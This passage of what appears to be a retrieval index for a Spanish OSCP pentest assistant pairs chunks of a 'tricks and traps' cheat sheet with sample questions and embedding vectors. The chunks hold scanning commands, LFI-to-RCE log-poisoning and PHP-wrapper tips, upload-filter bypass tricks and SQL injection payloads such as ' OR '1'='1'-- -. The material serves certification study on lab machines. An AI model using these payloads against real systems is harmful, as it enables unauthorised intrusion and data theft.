-0.05827, -0.04634, -0.05568, -0.03652, 0.01058, -0.00442, -0.07443, -0.04441, 0.06946, 0.04576, 0.03114, -0.00254, 0.02101, -0.04583, 0.07742, 0.02144, -0.00066, -0.04732, 0.13279, -0.03336, -0.10275, -0.00934, 0.04733, -0.05401, 0.03202, -0.12161, -0.06562, -0.07605, 0.0131, 0.084, -0.07962, -0.09362, 0.02374, -0.01725, 0.02202, -0.09959, 0.00514, -0.03818, -0.01654, -0.07204, 0.0063, 0.04319, -0.03361, -0.05924, 0.00801, 0.01932, -0.06507, -0.04208, -0.06103, -0.03247, 0.03785, 0.01169, -0.01018, 0.06112, 0.02788, 0.05566, 0.01318, -0.03828, 0.03164, -0.0117, 0.02785, 0.02586, 0.08235, 0.06527, 0.0256, 0.0349, 0.01476, -0.01969, -0.008, -0.01152, -0.05134, -0.04424, 0.0348, 0.00367, 0.06605, -0.05999, 0.07301, 0.02807, -0.00238, -0.03791, -0.03411, -0.05931, 0.06163, 0.05432, 0.01231, 0.00811, -0.00464, -0.0525, -0.05261, -0.00947, -0.04417, -0.05136, -0.01461, 0.0529, -0.00839, -0.04242, -0.03015, 0.0201, -0.00756, 0.05258, 0.02077, -0.05533, -0.01088, -0.01165, -0.03401, 0.03238, -0.01691, -0.04268, -0.00889, -0.03438, -0.00771, 0.06069, -0.00296, 0.04012, 0.02243, -0.0091, 0.04736, -0.02012, 0.04748, -0.01033, 0.01324, -0.00108, 0.0055, -0.03288, 0.04362, -0.02894, -0.00196, 0.00566, 0.01698, -0.0158, 0.00832, -0.03594, -0.08787, 0.04718, 0.02955, -0.08352, -0.05525, -0.02187, -0.00202, -0.03799, 0.01432, 0.02422, -0.00492, 0.0386]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "con que puedo montar un laboratorio seguro sin violar normas?", "v": [0.06993, -0.11687, -0.26269, -0.05578, -0.16542, -0.03875, 0.0388, 0.01722, -0.14844, -0.17761, 0.06803, -0.12451, 0.1741, 0.03117, 0.07878, 0.13572, 0.04455, -0.18049, -0.04968, 0.05623, 0.02012, -0.0666, -0.04332, -0.08398, 0.00049, 0.04139, 0.0332, -0.12796, 0.00309, 0.05503, -0.0328, 0.15383, 0.19374, 0.00276, -0.07453, -0.03751, -0.02732, -0.03791, 0.03485, 0.13145, 0.01625, -0.01185, 0.00598, -0.05888, -0.08643, -0.08459, -0.02294, -0.12119, 0.06028, -0.0421, 0.04542, 0.04143, -0.01743, 0.005, -0.07079, 0.01991, 0.11235, -0.00531, 0.10278, -0.06838, -0.0409, 0.0072, 0.04284, 0.09608, 0.01448, -0.02683, 0.01493, -0.02019, -0.08221, 0.00433, 0.02265, -0.03168, -0.02933, -0.00686, -0.05194, -0.07458, -0.13781, -0.03209, 0.04896, -0.01012, -0.05651, 0.14166, -0.01737, 0.03171, -0.0304, -0.05327, 0.06296, -0.02628, 0.0274, 0.00476, 0.00966, 0.06613, 0.0102, -0.06224, -0.01346, -0.1345, 0.10987, 0.07919, 0.01785, 0.00675, 0.02485, 0.01443, -0.00984, 0.08494, -0.00626, -0.01309, -0.01419, -0.00953, 0.12136, -0.08192, 0.0081, 0.01969, -0.09876, -0.10721, -0.08994, 0.04551, -0.09155, 0.0345, -0.03945, -0.0119, -0.03557, 0.00659, -0.00448, 0.03905, -0.01849, -0.09946, 0.11315, 0.09232, -0.00766, 0.03849, 0.00992, 0.04475, -0.04214, -0.00173, 0.06443, 0.04093, -0.07341, -0.03456, -0.03763, 0.01615, 0.04419, 0.09345, -0.03375, -0.05117, 0.00377, 0.05099, -0.05973, -0.03629, -0.05485, -0.03851, -0.02515, 0.08049, -0.00337, 0.07242, -0.1106, 0.053, 0.0609, -0.10674, 0.05083, 0.09347, -0.00089, 0.05578, -0.02245, -0.03114, 0.03751, 0.08885, 0.05046, -0.09067, 0.01444, 0.00246, 0.03962, 0.00588, 0.00913, -0.02829, 0.09057, 0.00283, -0.06672, -0.02353, 0.06107, -0.04499, -0.04491, 0.07684, -0.04998, -0.01736, 0.0117, 0.03868, 0.05454, 0.01177, 0.04824, 0.02351, 0.0711, 0.00405, -0.0136, -0.0072, -0.00093, -0.01976, 0.04619, 0.03001, 0.02013, -0.00603, 0.04013, -0.00053, -0.03958, -0.02588, 0.03158, -0.01052, -0.06945, 0.03129, -0.01768, 0.02087, 0.0689, 0.03102, 0.03074, -0.04834, -0.06929, -0.00374, 0.0245, 0.01636, -0.03604, 0.05434, 0.00897, 0.01311, 0.04768, -0.02796, -0.06045, 0.04837, -0.02857, 0.02078, 0.04659, 0.04073, -0.01557, 0.02418, -0.03183, 0.0276, 0.04631, 0.02894, 0.0162, -0.01159, -0.05931, -0.00796, 0.04381, 0.12789, -0.01048, -0.07024, -0.00185, -0.03173, -0.05107, 0.04509, 0.023, -0.01977, 0.02072, -0.01063, 0.01495, -0.08021, -0.00702, -0.01033]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "existe una alternativa libre a los kits de hacking profesionales?", "v": [0.11955, 0.0254, -0.09104, -0.03547, 0.02342, -0.17513, -0.12204, 0.07141, -0.1171, 0.00907, 0.01572, -0.11211, -0.01303, 0.03161, 0.17192, -0.03997, 0.05528, -0.11818, 0.12254, 0.01928, -0.0915, 0.06259, -0.09043, -0.01271, 0.00202, -0.13956, 0.02717, 0.12305, -0.17771, 0.03834, 0.03108, 0.00382, -0.13202, 0.04571, -0.11206, -0.00727, 0.03092, 0.04431, 0.18112, 0.06886, 0.07975, -0.03342, -0.05513, 0.07535, -0.00911, 0.02494, -0.18671, -0.04756, 0.08429, 0.09991, -0.02854, -0.04439, -0.12544, 0.00097, 0.07968, -0.14246, 0.08507, -0.06976, -0.05277, -0.15133, -0.09612, 0.12328, 0.06773, -0.01139, 0.06824, -0.00272, 0.03449, -0.02968, -0.11493, 0.09681, 0.00073, 0.00076, 0.0274, -0.02743, -0.07098, 0.02672, -0.00056, 0.08818, 0.00395, 0.04807, 0.00374, -0.04927, 0.06584, 0.01837, -0.13044, -0.06584, 0.04521, -0.08864, 0.01965, 0.01452, 0.07507, 0.15182, -0.01989, 0.02106, -0.04335, -0.07861, 0.0679, -0.00267, 0.04272, 0.05151, 0.03583, 0.02324, -0.07083, 0.02108, 0.00997, 0.02316, 0.049, -0.00499, -0.02789, -0.05505, -0.03711, 0.07754, 0.01909, -0.00602, -0.04124, -0.09269, 0.03321, 0.04061, -0.00806, 0.00893, -0.02623, -0.03763, 0.02917, 0.03183, 0.08297, -0.00856, -0.0577, 0.07287, -0.07997, -0.01762, 0.08975, -0.04825, -0.08393, 0.00776, -0.09704, 0.01877, 0.04562, -0.10078, -0.00785, -0.01918, -0.04852, 0.10514, -0.05079, -0.01888, 0.01301, -0.00334, 0.02388, -0.06174, 0.01121, -0.06978, -0.06403, 0.0679, -0.05659, 0.10056, -0.11247, 0.08293, -0.05474, -0.05808, -0.04908, 0.1117, 0.0351, -0.0108, 0.00344, -0.05527, -0.05757, 0.08716, 0.05572, -0.03503, -0.00726, 0.04974, 0.00087, 0.13079, 0.05268, -0.11654, 0.06265, -0.01248, -0.01232, -0.0771, 0.00738, -0.08847, -0.00657, -0.02963, -0.00764, 0.00864, -0.02028, -0.01801, 0.04112, 0.03677, -0.00588, 0.03073, -0.01817, -0.02943, -0.08856, 0.01799, -0.01141, -0.00512, -0.0068, -0.06246, 0.02362, -0.01437, -0.05593, -0.02597, 0.04048, -0.01261, -0.02793, 0.00478, -0.0253, -0.04737, -0.05797, 0.02194, 0.06269, -0.02148, -0.029, -0.00214, -0.02033, 0.00357, 0.04216, 0.01796, -0.03786, -0.03358, 0.04139, 0.01094, -0.01658, 0.01676, -0.01656, 0.03442, 0.00986, 0.08408, 0.00368, 0.00243, 0.05602, 0.02073, -0.0203, -0.00669, -0.01841, -0.01757, 0.01368, 0.00628, -0.03298, -0.01154, 0.00686, 0.03343, -0.01515, -0.07342, -0.06291, -0.0511, -0.05624, -0.0338, -0.00764, -0.03678, -0.06162, 0.06677, -0.00198, 0.0283, 0.03797, 0.02925]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de enumeraciΓ³n (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n AΓ±ade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeΓ±as ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "indexar": "que herramienta sirve para descubrir subdominios y vhosts que se estΓ‘n olvidando?", "v": [-0.08739, 0.0341, -0.26004, -0.14509, 0.03453, -0.03861, -0.11565, -0.07207, 0.0361, -0.17275, -0.09116, -0.10933, 0.00389, -0.06841, 0.06884, -0.04867, 0.18642, -0.04146, -0.06414, 0.0464, -0.014, 0.06208, -0.09795, -0.01736, -0.01802, -0.10931, -0.00522, 0.05163, -0.15958, 0.04496, 0.01172, -0.09942, -0.0267, -0.08681, -0.07969, -0.11202, -0.0698, -0.00112, -0.03631, 0.1072, 0.10013, 0.08447, -0.00067, 0.04542, -0.05422, -0.00711, -0.15327, 0.00628, 0.06833, 0.06039, -0.13629, -0.14084, -0.07221, -0.02884, 0.05432, -0.12087, 0.11509, -0.17873, 0.09103, -0.05342, -0.09138, 0.03667, 0.00507, -0.01222, 0.13209, -0.06712, -0.03861, 0.03346, -0.10217, 0.07627, -0.06214, -0.00566, 0.1525, 0.00809, -0.01459, -0.03503, 0.05564, 0.05595, 0.04468, -0.02045, 0.03885, 0.02239, -0.06112, 0.04758, -0.03284, -0.08987, 0.05565, -0.02249, 0.0159, -0.08762, 0.04615, 0.09996, 0.04349, -0.01664, 0.02549, -0.03322, 0.13028, -0.00807, 0.02802, -0.0025, 0.21296, 0.02231, -0.05493, 0.13378, 0.01568, 0.08166, -0.05314, -0.01141, -0.1145, -0.0278, 0.10634, 0.02985, -0.00514, -0.02831, -0.05787, 0.01213, -0.0486, -0.02123, 0.03115, -0.0621, 0.02202, 0.00493, -0.0436, -0.02954, -0.04842, 0.03955, -0.01038, 0.01578, 0.06399, -0.08188, 0.03404, -0.04014, -0.0481, 0.06828, -0.01865, -0.01248, 0.05946, -0.03977, 0.00462, 0.00931, 0.02346, 0.08895, -0.0838, -0.00267, 0.01578, 0.03814, 0.1131, -0.04556, -0.00538, 0.00213, -0.01655, -0.03249, 0.03365, 0.01201, -0.01933, -0.01309, 0.02474, -0.03968, -0.09259, 0.06432, -0.06347, -0.09957, 0.01299, -0.02023, 0.00674, -0.07123, -0.02491, 0.03042, 0.02152, 0.08451, 0.00441, 0.02468, 0.00184, -0.02624, 0.00022, -0.02714, -0.0395, -0.01579, -0.01215, -0.00761, 0.03838, -0.00496, -0.09864, 0.06489, -0.01422, -0.04789, 0.01564, -0.04573, -0.04879, -0.00374, 0.02634, -0.02778, -0.00186, -0.0151, 0.0033, -0.0068, 0.00609, -0.00456, -0.00208, -0.02707, -0.06733, 0.04364, -0.04773, 0.04383, 0.00421, 0.01106, -0.09542, 0.02242, -0.02966, -0.004, 0.02612, -0.04773, 0.00987, -0.05057, -0.03055, 0.03201, -0.03068, 0.0284, -0.0659, -0.01647, -0.01746, -0.00877, 0.05844, -0.01612, 0.00555, 0.0448, 0.0547, 0.04245, 0.00847, 0.02069, 0.03791, -0.01638, -0.02624, 0.04898, 0.00522, -0.06793, 0.06951, -0.0416, -0.02283, 0.05314, -0.01598, -0.01496, 0.0374, -0.02332, -0.07792, -0.05641, 0.03025, -0.03948, -0.01464, -0.01203, -0.00136, 0.00458, 0.04592, -0.01373, 0.03982, -0.00449]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de enumeraciΓ³n (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n AΓ±ade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeΓ±as ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "indexar": "con que puedo escanear todos los puertos hasta el 65535 en lugar de solo los primeros mil?", "v": [0.0723, -0.05364, -0.17263, 0.13111, -0.01557, -0.05433, 0.16156, -0.15601, -0.12463, -0.06738, -0.09042, 0.1639, 0.14652, -0.07149, 0.01364, -0.07, -0.04617, 0.06145, 0.02333, 0.02328, -0.03581, 0.01825, 0.00558, -0.0216, 0.09066, 0.02876, 0.03702, 0.03177, -0.06336, 0.04483, 0.00648, 0.13887, 0.03078, 0.02963, 0.14294, -0.16619, 0.00725, 0.05513, 0.06323, 0.03408, 0.00943, 0.02474, -0.04291, -0.0796, 0.09912, -0.0195, -0.14752, 0.04464, -0.0098, -0.05638, -0.08897, -0.0727, -0.02695, -0.01225, -0.11733, -0.02464, 0.06976, 0.06284, -0.02355, -0.07961, -0.02629, 0.09474, -0.00069, -0.097, 0.04101, 0.02993, -0.00323, 0.10141, -0.05936, -0.04575, -0.09202, 0.05373, -0.04855, 0.02136, 0.04793, -0.05981, 0.02366, 0.05329, -0.01212, 0.06111, 0.06264, -0.06059, -0.09702, -0.10402, -0.06653, 0.01119, -0.13498, -0.01328, 0.02951, -0.05915, 0.01974, -0.05403, 0.08003, 0.19559, -0.06796, -0.02419, 0.04989, 0.09779, -0.05526, -0.0432, 0.02845, 0.03745, -0.04122, 0.05809, 0.01847, 0.02471, 0.09684, -0.09088, 0.05782, -0.00417, 0.01698, 0.02902, 0.06376, -0.03751, -0.07695, 0.0308, -0.02383, -0.04553, 0.05695, -0.05825, -0.00413, -0.10312, 0.01147, 0.02603, 0.02981, 0.00766, -0.03258, 0.04239, 0.14246, 0.079, 0.0657, 0.05642, -0.01031, -0.07356, -0.00578, -0.02309, -0.00258, -0.09826, 0.01674, 0.01122, 0.04579, 0.07544, 0.02829, -0.01227, -0.04063, 0.02729, -0.03445, -0.02816, -0.08574, -0.06409, 0.00791, 0.00984, -0.08776, 0.00212, -0.05713, 0.09862, 0.12558, -0.02859, 0.09479, 0.06086, -0.01939, 0.02013, -0.02127, 0.00724, 0.02357, -0.09217, -0.02481, 0.04317, 0.0182, 0.02514, -0.03, 0.08769, -0.10171, -0.07247, 0.07046, 0.07, -0.04315, -0.0852, 0.05265, -0.01515, 0.03922, 0.07419, -0.04834, -0.02625, -0.04906, -0.0777, -0.01021, -0.13428, 0.02071, 0.10827, 0.01944, 0.03521, -0.08832, -0.01512, -0.0273, 0.01434, -0.02674, 0.05218, -0.00683, -0.06631, -0.0015, 0.04512, -0.0069, -0.04179, 0.02032, -0.02038, -0.05409, 0.05391, -0.05247, 0.05569, -0.00857, -0.02602, -0.01573, 0.01455, -0.0612, 0.0221, 0.02417, 0.01281, 0.01263, 0.06262, -0.00655, 0.075, 0.01799, -0.0257, -0.02102, 0.00854, 0.0896, 0.02524, 0.01786, 0.09311, 0.00709, -0.03709, -0.03869, -0.05822, 0.02324, 0.07381, 0.04755, -0.01916, -0.04278, 0.0059, 0.00286, 0.03326, -0.0607, -0.06808, -0.01585, -0.02961, -0.03952, 0.07106, 0.01132, -0.04409, -0.02673, 0.03569, 0.07154, -0.0486, 0.0445, -0.04157]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de enumeraciΓ³n (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n AΓ±ade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeΓ±as ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "indexar": "cual es una alternativa libre a gobuster o ffuf para hacer enumeraciΓ³n de hosts?", "v": [-0.10214, 0.02545, -0.11977, 0.05607, -0.02962, 0.05927, -0.04936, -0.07058, -0.17382, -0.1562, -0.16, -0.08191, -0.1058, 0.12764, 0.10996, -0.05274, 0.02461, -0.01292, 0.08804, 0.04143, -0.06477, 0.11039, -0.06393, 0.02194, -0.02274, -0.13748, -0.02337, 0.03801, -0.11452, -0.03327, 0.22003, -0.10216, 0.00079, -0.07998, 0.02699, 0.04446, 0.14533, 0.0163, 0.02537, 0.08052, 0.05255, -0.00309, -0.04288, 0.06584, -0.08552, -0.06869, -0.14263, -0.03096, 0.0658, 0.07072, 0.0374, -0.05907, 0.02235, -0.04952, 0.05642, -0.0444, -0.00437, -0.19046, -0.03889, 0.00903, -0.08464, -0.00077, 0.03045, -0.08145, 0.06432, 0.09332, -0.07783, 0.05359, -0.05669, 0.00618, 0.03511, -0.04172, 0.04621, -0.02575, -0.09025, 0.10323, -0.01711, -0.00623, 0.08433, 0.05136, -0.05234, -0.09949, 0.00465, 0.0517, 0.01043, -0.03554, 0.0844, -0.1068, -0.01156, 0.06436, 0.06844, 0.05692, 0.0528, 0.0947, 0.0404, -0.16206, 0.10752, 0.12717, 0.01987, 0.02313, 0.12953, -0.00502, -0.13809, 0.03931, 0.01986, -0.04203, 0.03449, 0.01815, -0.09172, 0.00373, 0.05043, 0.05022, -0.02404, -0.00081, -0.05382, -0.09661, -0.09042, 0.01193, 0.02124, 0.01806, -0.08857, -0.04365, -0.07173, -0.05129, 0.0641, 0.04957, 0.02696, 0.05421, -0.03461, 0.01634, 0.01474, -0.01605, -0.08094, -0.08723, -0.13544, -0.01956, 0.02399, -0.01877, 0.09845, 0.02099, 0.00398, 0.08219, 0.01425, 0.0279, -0.02034, -0.05406, 0.00984, -0.08759, -0.04801, -0.02109, -0.05385, 0.03998, 0.01292, 0.13774, 0.00503, 0.015, -0.01862, -0.00044, -0.02767, 0.08477, 0.05534, -0.04806, -0.02149, -0.03893, 0.07799, -0.05787, 0.01778, -0.00318, -0.08134, -0.04538, -0.04898, 0.05698, 0.03379, -0.07962, 0.06675, -0.04379, -0.00439, -0.09784, 0.00564, -0.05562, 0.06584, 0.03156, -0.05746, 0.03418, 0.02592, -0.00941, 0.0565, 0.01785, -0.02249, -0.00401, -0.03407, 0.03359, -0.04556, -0.06804, -0.01796, -0.00824, 0.01371, -0.05852, -0.03018, -0.04166, -0.04666, -0.05344, 0.03706, -0.04774, -0.00237, -0.00359, -0.06383, 0.0579, 0.03675, 0.02577, 0.05167, 0.01838, 0.07795, -0.03609, -0.01514, 0.01013, -0.00519, -0.04092, -0.01251, -0.02907, 0.08994, 0.01538, -0.00733, 0.02704, -0.01717, 0.03575, 0.04758, 0.08417, -0.04304, -0.01082, 0.00041, -0.01231, 0.02637, 0.00251, 0.02871, 0.0013, 0.02242, 0.04434, 0.0496, -0.01293, 0.04351, 0.06149, -0.03208, 0.02646, -0.00536, 0.00326, -0.08084, 0.0092, -0.05078, -0.01587, -0.02418, -0.01482, -0.0197, 0.02816, 0.04757, 0.02759]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "que tΓ©cnica sirve para extraer cΓ³digo fuente y credenciales en un sitio web?", "v": [-0.01723, -0.08218, -0.18118, -0.1066, 0.06259, -0.22261, 0.07029, -0.04004, 0.01562, -0.12375, -0.15537, -0.07091, -0.04378, -0.08598, 0.08932, -0.04022, 0.18943, -0.11078, 0.14134, -0.07699, -0.02973, -0.10448, -0.12882, -0.12875, -0.07448, -0.05051, -0.02576, -0.00552, -0.09778, 0.04955, 0.04807, 0.05834, 0.06905, 0.09817, -0.0678, 0.06748, 0.05192, 0.09362, -0.10293, 0.01997, -0.08748, -0.02059, -0.07514, 0.02658, -0.01239, -0.01799, 0.06404, 0.03755, 0.03341, 0.02574, -0.03929, -0.0788, -0.13075, -0.02707, -0.04211, 0.01343, 0.14041, -0.13327, -0.03912, -0.00507, -0.00965, -0.04471, -0.01072, -0.12765, -0.03069, 0.02281, 0.03362, 0.02998, -0.07646, -0.07221, -0.0272, 0.01463, 0.08871, -0.09557, 0.01961, -0.04624, -0.03565, -0.01749, 0.02732, 0.02718, 0.00325, 0.00639, -0.06247, -0.09137, -0.04328, -0.04634, 0.03564, -0.06766, -0.0288, -0.1459, 0.15662, 0.08247, 0.02741, -0.01601, -0.01364, -0.00882, 0.01418, 0.07446, 0.06173, 0.00562, 0.05848, -0.13083, 0.00645, 0.0562, 0.12601, 0.11833, 0.11109, -0.05045, -0.01644, -0.05081, -0.06685, 0.00693, -0.13773, 0.0198, -0.1452, 0.00992, -0.01543, 0.00364, -0.04065, -0.03786, -0.03063, -0.01761, -0.01828, 0.03654, -0.06829, 0.03486, -0.01377, 0.04168, 0.00026, -0.1179, -0.08679, -0.02072, -0.01971, 0.04963, 0.07045, -0.00973, 0.09034, 0.01257, -0.00672, 0.01889, -0.00246, -0.01556, -0.04859, 0.08468, 0.01106, 0.00172, 0.03428, -0.0787, -0.09804, -0.11119, -0.0319, 0.08856, -0.05063, 0.03637, -0.10372, 0.0051, 0.00249, -0.01582, -0.0923, 0.02499, -0.04818, -0.01787, 0.06086, -0.05063, -0.04655, 0.00866, -0.07268, -0.02357, 0.00536, 0.04252, 0.00221, 0.04227, 0.03141, -0.11038, 0.0572, 0.04436, -0.01434, -0.0569, -0.01473, -0.06235, -0.00303, -0.00379, 0.01179, -0.00536, -0.03088, 0.00835, 0.03432, -0.01941, -0.04828, -0.0086, 0.00533, -0.01077, -0.02735, 0.04756, 0.00056, 0.01437, 0.02936, 0.01067, 0.00998, -0.06311, -0.06441, 0.05038, 0.01357, -0.03586, 0.00161, 0.0631, 0.01308, -0.08527, -0.09419, 0.03809, 0.02848, -0.03586, 0.03954, -0.05672, -0.07024, -0.05053, 0.03068, -0.01057, -0.00589, -0.04039, 0.00694, -0.04465, -0.01623, 0.02257, 0.01803, -0.00278, 0.06622, 0.00204, -0.0295, 0.06241, -0.01871, -0.00862, -0.03963, -0.02354, 0.0483, -0.00171, -0.01726, 0.02597, -0.06139, -0.08632, -0.04072, -0.02561, -0.03113, -0.05052, -0.00278, -0.04724, -0.09492, -0.0126, 0.02344, -0.03996, 0.00352, -0.05201, 0.01813, -0.00256, 0.03942, 0.00542]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "cΓ³mo puedo probar si hay vulnerabilidad de lectura local a ejecuciΓ³n remota?", "v": [0.06322, 0.09321, -0.23036, -0.11795, 0.05189, 0.05715, 0.02327, 0.10036, -0.07809, -0.10896, -0.07383, -0.02441, 0.13041, 0.03724, 0.05547, 0.04441, 0.06148, 0.02543, -0.06101, -0.10439, 0.00612, -0.06961, -0.05978, 0.02429, 0.07637, -0.01128, 0.05094, -0.00109, 0.1062, -0.11527, -0.05456, 0.00753, 0.09036, -0.00739, -0.05893, 0.13031, 0.02661, 0.00599, 0.08999, 0.03585, 0.12473, 0.06456, -0.03708, -0.01241, 0.07158, -0.02285, -0.02029, -0.05529, -0.12882, -0.00211, -0.0805, 0.02122, -0.07582, -0.13484, 0.02105, 0.0421, 0.13875, -0.07961, 0.05588, -0.02003, -0.06332, 0.01628, 0.07504, -0.0288, 0.14984, -0.11626, -0.07133, 0.04286, -0.13895, 0.08068, -0.04895, -0.02445, -0.07607, 0.05353, -0.04896, -0.02549, -0.04681, 0.00101, 0.08297, -0.04954, 0.034, 0.00613, -0.02554, -0.02804, -0.11265, -0.08653, 0.0444, -0.08942, 0.11961, -0.05646, 0.11582, -0.06806, -0.04234, 0.02526, 0.00616, -0.02736, 0.08944, -0.04607, -0.04302, 0.01889, -0.00959, -0.06737, -0.02614, 0.08511, 0.02429, 0.00676, -0.07998, 0.00326, 0.0492, -0.11647, 0.04057, -0.02779, -0.12456, -0.04105, -0.12186, -0.03346, -0.02503, -0.00693, 0.07549, 0.02057, -0.12159, -0.0628, -0.11522, -0.04634, 0.02343, 0.00455, 0.00095, 0.03011, -0.0015, 0.0155, 0.00934, 0.00538, 0.0182, -0.01267, 